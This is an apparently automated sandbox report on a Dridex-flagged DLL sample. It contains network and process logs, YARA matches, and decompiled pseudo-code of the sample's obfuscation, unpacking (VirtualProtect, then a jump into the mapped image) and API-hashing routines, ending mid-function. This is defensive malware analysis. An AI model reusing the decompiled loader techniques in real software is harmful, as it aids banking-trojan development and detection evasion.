Jul 28, 2021 21:02:54.765511036 CEST	54064	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:54.786180973 CEST	53	54064	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:55.894237995 CEST	52811	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:55.916250944 CEST	53	52811	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:56.954866886 CEST	55299	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:56.975554943 CEST	53	55299	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:58.964678049 CEST	63745	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:58.986041069 CEST	53	63745	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:00.233464956 CEST	50055	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:00.255450964 CEST	53	50055	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:04.465789080 CEST	61374	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:04.486534119 CEST	53	61374	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:05.520246983 CEST	50339	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:05.541695118 CEST	53	50339	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:07.119601965 CEST	63307	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:07.140296936 CEST	53	63307	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:16.003654957 CEST	49694	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:16.025439978 CEST	53	49694	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:31.756306887 CEST	54982	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:31.787667990 CEST	53	54982	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:33.473274946 CEST	50010	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:33.497868061 CEST	53	50010	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:45.321088076 CEST	63718	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:45.415860891 CEST	53	63718	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:45.454898119 CEST	62116	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:45.492161036 CEST	53	62116	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:45.941066027 CEST	63816	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:46.048563004 CEST	53	63816	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:47.362243891 CEST	55014	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:47.382900953 CEST	53	55014	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:47.950758934 CEST	62208	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:48.129303932 CEST	53	62208	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:48.890731096 CEST	57574	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:48.912436962 CEST	53	57574	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:49.429601908 CEST	51818	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:49.450651884 CEST	53	51818	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:51.175411940 CEST	56628	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:51.299721956 CEST	53	56628	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:51.969790936 CEST	60778	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:51.990619898 CEST	53	60778	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:52.665848970 CEST	53799	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:52.691879988 CEST	53	53799	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:53.311211109 CEST	54683	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:53.332066059 CEST	53	54683	8.8.8.8	192.168.2.6
Jul 28, 2021 21:03:54.193006039 CEST	59329	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:03:54.214898109 CEST	53	59329	8.8.8.8	192.168.2.6
Jul 28, 2021 21:04:20.343085051 CEST	64021	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:04:20.369200945 CEST	53	64021	8.8.8.8	192.168.2.6
Jul 28, 2021 21:04:24.975008965 CEST	56129	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:04:25.016398907 CEST	53	56129	8.8.8.8	192.168.2.6
Jul 28, 2021 21:04:26.493860960 CEST	58177	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:04:26.529123068 CEST	53	58177	8.8.8.8	192.168.2.6

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6524 Parent PID: 6052

General

Start time:	21:02:45
Start date:	28/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll'
Imagebase:	0xf50000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6536 Parent PID: 6524

General

Start time:	21:02:46
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6576 Parent PID: 6536

General

Start time:	21:02:46
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1
Imagebase:	0x50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.390127958.000000006E2D1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.388937385.000000006E2D1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5784 Parent PID: 6576

General

Start time:	21:03:17
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 672
Imagebase:	0xbb0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6524 Parent PID: 6052 loaddll32.exeCOMMON

Executed Functions

Non-executed Functions

Function 6E5648FD, Relevance: 5.0, Strings: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E6E5648FD() {
				intOrPtr _t113;
				signed char _t144;
				signed int _t164;
				void* _t204;

				L0:
				while(1) {
					L0:
					 *(_t204 + 0x9e) = 0x2963;
					 *(_t204 + 0x84) = 0;
					 *((intOrPtr*)(_t204 + 0x80)) = 0x54fd3697;
					_t113 = ( *(_t204 + 0x90) ^ 0x176801da) -  *((intOrPtr*)(_t204 + 0x80));
					asm("sbb ecx, edx");
					 *((intOrPtr*)(_t204 + 0xc)) =  *((intOrPtr*)(_t204 + 0x94));
					 *((intOrPtr*)(_t204 + 8)) = _t113;
					if(_t113 >= 0) {
						break;
					}
					L1:
					 *(_t204 + 0x9d) =  *(_t204 + 0x1f);
					 *(_t204 + 0x50) =  *(_t204 + 0x50) + 1;
					while(1) {
						L29:
						 *(_t204 + 0x9e) =  *(_t204 + 0x9e) ^ 0x0000ffff;
						 *(_t204 + 0x9d) = 0x2b;
						__eflags =  *(_t204 + 0x50) -  *(_t204 + 0x58) >> 1;
						if( *(_t204 + 0x50) <  *(_t204 + 0x58) >> 1) {
							goto L18;
						}
						L30:
						L2:
						__eflags =  *(_t204 + 0x54);
						if( *(_t204 + 0x54) != 0) {
							L28:
							 *(_t204 + 0x5c) =  *( *(_t204 + 0x6c) + 0x18);
						} else {
							L3:
							_t69 = _t204 + 0x9e; // 0x7e26
							 *(_t204 + 0x9e) =  *_t69;
							 *((intOrPtr*)(_t204 + 0x78)) =  *((intOrPtr*)(_t204 + 0x48));
							__eflags = 0x37 -  *((intOrPtr*)(_t204 + 0x63));
							if(0x37 >  *((intOrPtr*)(_t204 + 0x63))) {
								L24:
								 *(_t204 + 0x5c) = 0;
							} else {
								L23:
								L15:
								 *((intOrPtr*)(_t204 + 0x48)) =  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x78))));
								L16:
								__eflags =  *((intOrPtr*)(_t204 + 0x48)) -  *((intOrPtr*)(_t204 + 0x40));
								if( *((intOrPtr*)(_t204 + 0x48)) !=  *((intOrPtr*)(_t204 + 0x40))) {
									L25:
									 *(_t204 + 0x9e) =  *(_t204 + 0x9e) * 0xdec1;
									 *(_t204 + 0x9e) =  *(_t204 + 0x9e) ^  *(_t204 + 0x9e);
									 *(_t204 + 0x6c) =  *((intOrPtr*)(_t204 + 0x48)) + 0xfffffffffffffff8;
									 *(_t204 + 0x58) =  *( *(_t204 + 0x6c) + 0x2c) & 0x0000ffff;
									 *((intOrPtr*)(_t204 + 0x64)) =  *((intOrPtr*)( *(_t204 + 0x6c) + 0x30));
									_t164 =  *(_t204 + 0x6c);
									 *(_t204 + 0x9e) = 0x9bb9 -  *(_t204 + 0x9e);
									 *(_t204 + 0x9e) =  *(_t204 + 0x9e) &  *(_t204 + 0x9e);
									 *(_t204 + 0x8c) =  *(_t204 + 0x8c) ^ 0xffffffff;
									__eflags =  *((intOrPtr*)(_t164 + 0x18)) -  *(_t204 + 0x7c);
									if( *((intOrPtr*)(_t164 + 0x18)) ==  *(_t204 + 0x7c)) {
										L11:
										__eflags =  *(_t204 + 0x7c);
										if( *(_t204 + 0x7c) != 0) {
											L27:
											 *(_t204 + 0x5c) =  *(_t204 + 0x6c);
											 *(_t204 + 0x9e) =  *(_t204 + 0x9e) -  *(_t204 + 0x9e);
										} else {
											L12:
											goto L8;
										}
									} else {
										L26:
										L8:
										 *(_t204 + 0x9e) =  *(_t204 + 0x9e) +  *(_t204 + 0x9e);
										 *(_t204 + 0x54) = 0;
										 *(_t204 + 0x50) =  *(_t204 + 0x88) ^ 0x53968bcc;
										L29:
										 *(_t204 + 0x9e) =  *(_t204 + 0x9e) ^ 0x0000ffff;
										 *(_t204 + 0x9d) = 0x2b;
										__eflags =  *(_t204 + 0x50) -  *(_t204 + 0x58) >> 1;
										if( *(_t204 + 0x50) <  *(_t204 + 0x58) >> 1) {
											goto L18;
										}
									}
								} else {
									L17:
									goto L24;
								}
							}
						}
						L7:
						return  *(_t204 + 0x5c);
						L31:
						L18:
						 *(_t204 + 0x9d) =  *(_t204 + 0x1f) | 0x000000f2;
						 *(_t204 + 0xa4) = 0;
						 *(_t204 + 0xa0) = 0;
						 *(_t204 + 0x4e) =  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x64)) +  *(_t204 + 0x50) * 2));
						__eflags = ( *(_t204 + 0x4e) & 0x0000ffff) - 0x41;
						if(__eflags >= 0) {
							__eflags = ( *(_t204 + 0x4e) & 0x0000ffff) - 0x5a;
							if(__eflags <= 0) {
								 *(_t204 + 0x4e) =  *(_t204 + 0x88) + 0xac697495 + ( *(_t204 + 0x4e) & 0x0000ffff) - 0x41;
							}
						}
						L19:
						 *(_t204 + 0x9e) =  !( *(_t204 + 0x9e));
						 *(_t204 + 0x9e) = 0x7e26;
						_t52 = _t204 + 0x9e; // 0x7e26
						 *(_t204 + 0x9e) =  *_t52 * 0x36ef;
						 *(_t204 + 0x54) = (_t144 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff;
						 *(_t204 + 0xa4) =  *(_t204 + 0x10);
						 *(_t204 + 0xa0) =  *(_t204 + 0x14);
						_t144 =  *(_t204 + 0x1f) ^ 0x000000ff;
						 *(_t204 + 0x9d) = _t144;
						__eflags =  *(_t204 + 0x4e) & 0x0000ffff;
						 *((intOrPtr*)(_t204 + 4)) = ( *( *((intOrPtr*)(_t204 + 0x68)) +  *(_t204 + 0x50) * 2) & 0x0000ffff) - ( *(_t204 + 0x4e) & 0x0000ffff);
						if(( *(_t204 + 0x4e) & 0x0000ffff) == 0) {
							L4:
							goto L2;
						} else {
							L20:
							L13:
							 *(_t204 + 0x9d) =  *(_t204 + 0x1f) | 0x000000ca;
							 *(_t204 + 0x8c) =  *(_t204 + 0x8c) |  *(_t204 + 0x8c);
							__eflags =  *(_t204 + 0x54);
							if( *(_t204 + 0x54) == 0) {
								goto L4;
							} else {
								L14:
								goto L0;
							}
						}
						goto L7;
					}
				}
				L6:
				goto L27;
			}

0x6e5648fd
0x6e5648fd
0x6e5648fd
0x6e564945
0x6e564954
0x6e56495f
0x6e564978
0x6e56497a
0x6e56497c
0x6e564980
0x6e564984
0x00000000
0x00000000
0x6e5648e2
0x6e5648ea
0x6e5648f4
0x6e564d25
0x6e564d25
0x6e564d31
0x6e564d41
0x6e564d4c
0x6e564d4e
0x00000000
0x00000000
0x6e564d54
0x6e5648ff
0x6e5648ff
0x6e564904
0x6e564d15
0x6e564d1c
0x6e56490a
0x6e56490a
0x6e564b7d
0x6e564b85
0x6e564b95
0x6e564b99
0x6e564b9b
0x6e564c1c
0x6e564c1c
0x6e564b9d
0x6e564b9d
0x6e564a25
0x6e564a2b
0x6e564a2f
0x6e564a33
0x6e564a37
0x6e564c29
0x6e564c40
0x6e564c5c
0x6e564c66
0x6e564c72
0x6e564c7d
0x6e564c89
0x6e564c90
0x6e564caf
0x6e564cc1
0x6e564cc8
0x6e564cca
0x6e5649e3
0x6e5649e3
0x6e5649e8
0x6e564cf0
0x6e564cf4
0x6e564d08
0x6e5649ee
0x6e5649ee
0x00000000
0x6e5649ee
0x6e564cd0
0x6e564cd0
0x6e56499b
0x6e5649b2
0x6e5649bf
0x6e5649c7
0x6e564d25
0x6e564d31
0x6e564d41
0x6e564d4c
0x6e564d4e
0x00000000
0x00000000
0x6e564d4e
0x6e564a3d
0x6e564a3d
0x00000000
0x6e564a3d
0x6e564a37
0x6e564b9b
0x6e56498f
0x6e56499a
0x00000000
0x6e564a8c
0x6e564a9a
0x6e564aa1
0x6e564aac
0x6e564abb
0x6e564ac5
0x6e564ac8
0x6e5649d5
0x6e5649d8
0x6e564b71
0x6e564b71
0x6e5649d8
0x6e564ace
0x6e564ad9
0x6e564aed
0x6e564af7
0x6e564b0e
0x6e564b19
0x6e564b21
0x6e564b2c
0x6e564b3c
0x6e564b3f
0x6e564b46
0x6e564b49
0x6e564b4d
0x6e564935
0x00000000
0x6e564b53
0x6e564b53
0x6e5649f0
0x6e5649fb
0x6e564a10
0x6e564a17
0x6e564a1a
0x00000000
0x6e564a20
0x6e564a20
0x00000000
0x6e564a20
0x6e564a1a
0x00000000
0x6e564b4d
0x6e564d25
0x6e56498a
0x00000000

Strings

&~+, xrefs: 6E564B7D
c)+, xrefs: 6E564D25
+, xrefs: 6E564D41
c), xrefs: 6E564945

Memory Dump Source

Source File: 00000000.00000002.324587621.000000006E564000.00000020.00020000.sdmp, Offset: 6E560000, based on PE: true

Associated: 00000000.00000002.324559041.000000006E560000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.324573222.000000006E561000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.324603878.000000006E568000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.324624459.000000006E587000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.324643149.000000006E58E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: &~+$+$c)$c)+
API String ID: 0-407474879
Opcode ID: 0b5cdd9877ba7c3a6f979bf1e20c51d658e71f4d97029eea0b422202cf0e6d20
Instruction ID: d18e52e1f6f09f140b18feb78bc3cac5af9a8a33a0b1f4afa760bcc5b899edb1
Opcode Fuzzy Hash: 0b5cdd9877ba7c3a6f979bf1e20c51d658e71f4d97029eea0b422202cf0e6d20
Instruction Fuzzy Hash: BB217C3814C3C18AD264DFA9C46079BBBE1BF8A704F148C0DE9C987766D6B49886CB47

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6576 Parent PID: 6536 rundll32.exeCOMMON

Executed Functions

Function 02841F54, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02841F54(void* __ebx, long __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				int _v128;
				void* _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _t137;
				int _t144;
				int _t152;
				int _t156;
				intOrPtr _t175;
				int _t181;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t137 + 0x20));
				 *0x2844418 = 1;
				asm("movaps xmm0, [0x2843010]");
				asm("movups [0x2844428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x4c));
				_v180 = _t236;
				_v176 =  *((intOrPtr*)(_v48 + 0x60));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t137 + 0x3c));
				_v64 = 4;
				_v68 = _t236;
				_v72 =  &_v20;
				_t144 = VirtualProtect(__ebx, __esi, __edi, _t265); // executed
				_v76 = _t144;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x60));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02841B0D();
				E02842443(_v68,  *((intOrPtr*)(_v48 + 0x18)), _v60);
				E02841B0D( *((intOrPtr*)(_v48 + 0x18)), 0, _v60);
				_t152 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x84;
				_t226 = _v68;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v96 = _t152;
				_v100 = _v68 + 0x3c;
				_v104 = _t226;
				_v108 = _t251;
				if(_t251 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v164 = _v104;
				if(_v52 != 0) {
					_v116 = 0;
					_v112 = _v164 + 0x18 + ( *(_v164 + 0x14) & 0x0000ffff);
					while(1) {
						_t175 = _v112;
						_v120 = _t175;
						_t247 = _v120;
						_v180 = _v68 +  *((intOrPtr*)(_t247 + 0xc));
						_v176 =  *((intOrPtr*)(_t247 + 8));
						_v172 =  *((intOrPtr*)(0x2844418 + (( *(_t175 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t175 + 0x24) >> 0x1f << 3) + (( *(_t175 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v124 = _v116;
						_t181 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t234 = _v124 + 1;
						_v128 = _t181;
						_v116 = _t234;
						_v112 = _v120 + 0x28;
						if(_t234 == _v52) {
							goto L7;
						}
					}
				}
				L7:
				 *_t272 = _v68;
				_v136 = _v68 +  *((intOrPtr*)(_v48 + 0x5c));
				_t156 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t229 =  *_v100;
				_v156 = _t156;
				_v160 = _t229;
				_v132 = _v68;
				if(_t229 != 0) {
					_v132 = _v68 + (_v160 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x1c));
				_v40 =  *((intOrPtr*)(_t240 + 0x2c));
				_v36 =  *((intOrPtr*)(_t240 + 0x38));
				_v32 =  *((intOrPtr*)(_t240 + 0xc));
				_v28 =  *((intOrPtr*)(_t240 + 0x34));
				_v24 = _v136;
				 *_t273 = _t240;
				_v180 = 0;
				_v176 = 0x68;
				_v140 =  &_v44;
				_v144 = 0;
				_v148 = 0x68;
				_v152 =  *((intOrPtr*)(_v132 + 0x28));
				E02841B0D();
				if(_v152 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02841f60
0x02841f6e
0x02841f75
0x02841f78
0x02841f82
0x02841f89
0x02841f93
0x02841f99
0x02841fa2
0x02841fab
0x02841fae
0x02841fb2
0x02841fba
0x02841fc1
0x02841fc4
0x02841fc7
0x02841fca
0x02841fcd
0x02841fe7
0x02841fed
0x02841ff0
0x02841ff8
0x02841ffc
0x02841fff
0x02842002
0x02842005
0x02842008
0x02842024
0x02842041
0x02842066
0x02842068
0x02842071
0x02842074
0x0284207e
0x02842081
0x02842084
0x02842087
0x0284208a
0x0284228a
0x0284228a
0x02842228
0x0284222e
0x02842214
0x02842217
0x028420b4
0x028420b4
0x028420cb
0x028420f0
0x028420f9
0x028420fc
0x02842100
0x02842104
0x0284210b
0x0284210e
0x02842110
0x0284211c
0x02842124
0x02842127
0x0284212a
0x0284212d
0x00000000
0x00000000
0x02842133
0x028420b4
0x028421b6
0x028421c4
0x028421cc
0x028421d2
0x028421d4
0x028421da
0x028421e6
0x028421ec
0x028421f2
0x028421f5
0x0284224a
0x0284224a
0x02842148
0x0284214e
0x02842154
0x0284215a
0x02842160
0x02842166
0x0284216f
0x02842172
0x02842175
0x0284217d
0x02842185
0x0284218b
0x02842191
0x02842197
0x0284219d
0x028421ab
0x0284226b
0x02842271
0x02842271
0x028420ae

APIs

VirtualProtect.KERNELBASE ref: 02841FCD
VirtualProtect.KERNELBASE ref: 02842066

Strings

h, xrefs: 0284217D

Memory Dump Source

Source File: 00000003.00000002.426510985.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: h
API String ID: 544645111-2439710439
Opcode ID: 1e8b9ee4cfcabcc3a9967ee6837e1522750afac2373c55c9e92f0155ab78fa5b
Instruction ID: 1786fe1d0a5666fb50fd34d13659970268f2b3567c5defd2a20f7813a1f88a14
Opcode Fuzzy Hash: 1e8b9ee4cfcabcc3a9967ee6837e1522750afac2373c55c9e92f0155ab78fa5b
Instruction Fuzzy Hash: E191ABB8D04218CFCB04CF98C880A9DFBF1BF88314F5585AAE959AB355D730A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 028420B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0284210E

Strings

h, xrefs: 0284217D

Memory Dump Source

Source File: 00000003.00000002.426510985.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: h
API String ID: 544645111-2439710439
Opcode ID: c009a59a0a2a4731717e91de92ac723f62e22dc0dbf513deef535787048e1aa5
Instruction ID: 7cb3fb8ec9c337ae9b1365340facab57330ce4b67f8befa157c2e064d907ac8b
Opcode Fuzzy Hash: c009a59a0a2a4731717e91de92ac723f62e22dc0dbf513deef535787048e1aa5
Instruction Fuzzy Hash: 7851C1B9D00229CFCB10CF69C980A9CFBB1FF48314F5585AAD958A7342D730A951CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2E3600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E2E3600(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e2ed228 == 0x8c456a83) {
					_t7 = E6E2E303C(0xfe338407, 0x82fffbdc);
					 *0x6e2ed22c = E6E2E303C(0xfe338407, 0xc09bf2f8);
					if( *0x6e2ed228 == 0x8c456a83) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e2ed228 = 0;
					}
				}
				_t3 = E6E2E303C(0xfe338407, 0xdb278333);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e2ed228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e2e3608
0x6e2e3610
0x6e2e3643
0x6e2e3654
0x6e2e365f
0x6e2e366a
0x6e2e366c
0x6e2e366c
0x6e2e365f
0x6e2e361c
0x6e2e3623
0x00000000
0x6e2e3625
0x6e2e3625
0x6e2e3626
0x6e2e3628
0x6e2e362a
0x6e2e362b
0x00000000
0x6e2e362b

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,FE338407,C09BF2F8,FE338407,82FFFBDC,?,?,00000000,6E2DDE41,?,?), ref: 6E2E366A

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3b10794444188438f9e712f0c613da2d77f788ced10ba20041234d4bcc5f628e
Instruction ID: c6359eba8580394232bf11f2d26d34ea6d35895ed94e5e473dc22ef90295c345
Opcode Fuzzy Hash: 3b10794444188438f9e712f0c613da2d77f788ced10ba20041234d4bcc5f628e
Instruction Fuzzy Hash: C8F0592515807ABFD2501AF2DD0CEA3F38AF781353FB00838B588C2FA0D96188028639

Uniqueness

Uniqueness Score: -1.00%

Function 02842491, Relevance: 1.4, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 028425AA

Memory Dump Source

Source File: 00000003.00000002.426510985.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a80d2c0016d34ae6438100e352d4127c10d911ad3cdf2fc261449d021695c12
Instruction ID: 8d2b1f9ee443b5b5c673e9e286748ce919e9d6ed8811c2aa3453246060571496
Opcode Fuzzy Hash: 2a80d2c0016d34ae6438100e352d4127c10d911ad3cdf2fc261449d021695c12
Instruction Fuzzy Hash: 0E4124B9D042198FDB04CFA8C5906AEBBF1FF48704F24856DE848AB340D735A841CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E2E0754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E6E2E0754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				char _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t201;
				char _t204;
				void* _t213;
				void* _t214;
				char _t216;
				char _t217;
				char _t224;
				char _t239;
				char _t242;
				char _t245;
				char _t248;
				char _t251;
				char _t255;
				char _t260;
				void* _t269;
				void* _t270;
				char _t272;
				char _t273;
				void* _t277;
				char _t278;
				char _t279;
				char _t283;
				intOrPtr* _t292;
				signed char _t295;
				signed char _t296;
				intOrPtr* _t321;
				intOrPtr* _t326;
				intOrPtr* _t348;
				intOrPtr* _t364;
				char _t365;
				intOrPtr* _t370;
				intOrPtr* _t373;
				intOrPtr* _t378;
				char _t383;
				char _t384;
				char _t385;
				char _t386;
				char _t387;
				char _t388;
				char _t394;
				char _t396;
				char _t402;
				char _t404;
				intOrPtr* _t405;
				signed int _t407;
				intOrPtr* _t410;
				intOrPtr* _t412;
				signed int _t414;
				void* _t415;
				void* _t416;
				char _t421;
				intOrPtr* _t424;
				void* _t426;
				intOrPtr* _t428;
				void* _t429;
				void* _t430;

				_t415 = __ecx;
				_t155 =  *0x6e2ed1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E6E2E35F4(0x30);
					 *0x6e2ed1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t415 != 0) {
